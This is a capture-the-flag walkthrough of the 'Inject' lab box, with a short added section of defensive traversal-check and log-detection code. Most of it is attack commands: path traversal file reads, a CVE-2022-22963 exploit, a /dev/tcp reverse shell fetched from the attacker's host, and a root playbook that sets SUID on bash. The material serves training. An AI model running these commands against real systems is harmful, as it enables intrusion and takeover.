Explore the fundamentals of cybersecurity in the Inject Capture The Flag (CTF) challenge, an easy-level box. This straightforward CTF writeup walks through the key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts

```text
10.10.11.204 inject.htb
```
Script to add hosts automatically (appends the entry only if it is not already present):

```bash
ip="10.10.11.204"
domain="inject.htb"
# Append "<ip> <domain>" to /etc/hosts unless that exact line already exists
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts
```
Mapping

```text
Nmap scan report for inject.htb (10.10.11.204)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
|   256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
|_  256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Despite the `nagios-nsca` guess, port 8080 serves a web application (note the `http-title: Home`). Browsing it reveals a home page and an upload page:

http://10.10.11.204:8080/
http://10.10.11.204:8080/upload
LFI

The `img` parameter of `/show_image` is joined onto a directory on disk without any containment check, so a path traversal reads arbitrary files:

```bash
# Read /etc/passwd through the traversal; keep only accounts with a login shell
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd' | grep sh$
# Request a file that does not exist to provoke an error message
curl -s 'http://10.10.11.204:8080/show_image?img=pwn' | jq
```
Output: the error for the non-existent file discloses the directory the endpoint reads from, which is the base path for the traversal:

```json
{
  "timestamp": "2024-12-05T05:22:30.253+00:00",
  "status": 500,
  "error": "Internal Server Error",
  "message": "URL [file:/var/www/WebApp/src/main/uploads/pwn] cannot be resolved in the file system for checking its content length",
  "path": "/show_image"
}
```
Three levels up from the uploads directory sits the project's Maven `pom.xml`:

```bash
curl -s 'http://10.10.11.204:8080/show_image?img=../../../pom.xml'
```
Real path: fetch `pom.xml` via its absolute location and scan the declared dependencies with Snyk:

```bash
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../../../../var/www/WebApp/pom.xml' > pom.xml
snyk test --file=pom.xml
```
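The traversal works because `show_image` concatenates the `img` value onto the upload directory and never checks where the result lands. The following is an added example, not code from the box or its Java application: it shows the canonicalise-and-contain check a fixed handler needs, and a detector that flags the same requests in a web access log. The access-log lines are constructed for the example, and `UPLOAD_DIR` is taken from the error body above.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlparse

# Upload directory the endpoint reads from (from the 500 error body in the writeup).
UPLOAD_DIR = "/var/www/WebApp/src/main/uploads"


def resolve_image_path(img, base=UPLOAD_DIR):
    """Map the (already URL-decoded) ?img= value onto the upload directory.
    Returns the normalised absolute path when it stays inside `base`, else None.
    String-only so it runs offline; a real handler should additionally apply
    os.path.realpath() so a symlink inside `base` cannot point outside it."""
    if not img or "\x00" in img:
        return None
    # join() discards `base` when img is absolute, so "/etc/passwd" fails the
    # containment test below exactly like "../../../pom.xml" does.
    candidate = posixpath.normpath(posixpath.join(base, img))
    if not candidate.startswith(base + "/"):
        return None
    return candidate


# Dot-dot sequences in raw, percent-encoded or double-encoded form.
TRAVERSAL = re.compile(r"\.\.[/\\]|%2e%2e|%252e", re.IGNORECASE)
REQUEST = re.compile(r'^(\S+) .*?"GET (\S+) HTTP')


def traversal_alerts(log_lines):
    """Return (client_ip, decoded_img) for /show_image requests whose img
    parameter carries a traversal sequence. Assumes combined-format access logs."""
    alerts = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlparse(m.group(2))
        if url.path != "/show_image":
            continue
        img = parse_qs(url.query).get("img", [""])[0]  # parse_qs decodes %xx once
        if TRAVERSAL.search(img):
            alerts.append((m.group(1), img))
    return alerts


# Constructed access-log lines mirroring the requests made in this writeup.
SAMPLE_LOG = [
    '10.10.14.18 - - [05/Dec/2024:05:22:30 +0000] "GET /show_image?img=../../../../../../etc/passwd HTTP/1.1" 200 2551',
    '10.10.14.18 - - [05/Dec/2024:05:22:31 +0000] "GET /show_image?img=pwn HTTP/1.1" 500 226',
    '10.10.14.18 - - [05/Dec/2024:05:22:32 +0000] "GET /show_image?img=%2e%2e%2f%2e%2e%2fpom.xml HTTP/1.1" 200 4042',
    '10.10.14.18 - - [05/Dec/2024:05:22:33 +0000] "GET /upload HTTP/1.1" 200 1320',
]
```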
CVE-2022-22963

Output: Snyk flags `spring-cloud-function-context` 3.2.2, which is vulnerable to CVE-2022-22963 (remote code execution through the function router):

```text
✗ Remote Code Execution [Critical Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645] in org.springframework.cloud:spring-cloud-function-context@3.2.2
  introduced by org.springframework.cloud:spring-cloud-function-web@3.2.2 > org.springframework.cloud:spring-cloud-function-context@3.2.2
```
A public PoC is available at https://www.exploit-db.com/exploits/51577. Download it, build the reverse shell script with the VPN address, and serve the script over HTTP:

```bash
wget https://www.exploit-db.com/raw/51577 -O poc                     # PoC for CVE-2022-22963
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')   # own tun0 address
echo -e '/bin/bash -i >& /dev/tcp/'$vpnip'/9001 0>&1' > rev.sh         # reverse shell to port 9001
python -m http.server                                                  # serve rev.sh on port 8000
```
Listener

With a listener waiting on port 9001, run the PoC twice: first to fetch `rev.sh` onto the box, then to execute it:

```bash
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'curl http://10.10.14.18:8000/rev.sh -o /tmp/rev.sh'
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'bash /tmp/rev.sh'
```
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Press Ctrl+Z to background the shell, then run:

```bash
stty size; stty raw -echo; fg
```
As the last step, set the terminal environment.

Frank's Maven `settings.xml` contains the password needed to switch to phil, who holds the user flag:

```bash
cat /home/frank/.m2/settings.xml
su phil
cat /home/phil/user.txt
```
Although I rarely mention using pspy on Linux, it is essential to run it regularly, much like linpeas on Linux or BloodHound on Windows, particularly when you are stuck.
```bash
curl -s http://10.10.14.18:8000/pspy64 -o ps
chmod +x ps
./ps
```
After execution, we observe numerous Ansible runs in the output: root periodically executes every playbook in `/opt/automation/tasks/` and restores `playbook_1.yml` from `/root`.

```text
/usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
/usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
```
Since the task directory is writable by phil while the playbooks are executed as root, any playbook dropped there runs with root privileges. Create one modelled on the existing playbook:

```bash
cd /opt/automation/tasks/
cat playbook_1.yml
nano shell.yml
```
```yaml
- hosts: localhost
  tasks:
    - name: Set SUID bit on /bin/bash
      ansible.builtin.shell:
        cmd: "/usr/bin/chmod +s /bin/bash"
```
Now, we just wait for the automation to pick up the playbook and the SUID change to take effect:

```bash
watch -n 1 'ls -la /bin/bash'
```

Before:

```text
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
```

After the playbook has run:

```text
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
```

Start bash with `-p` so it keeps the effective uid of root, and read the root flag:

```bash
bash -p
cat /root/root.txt
```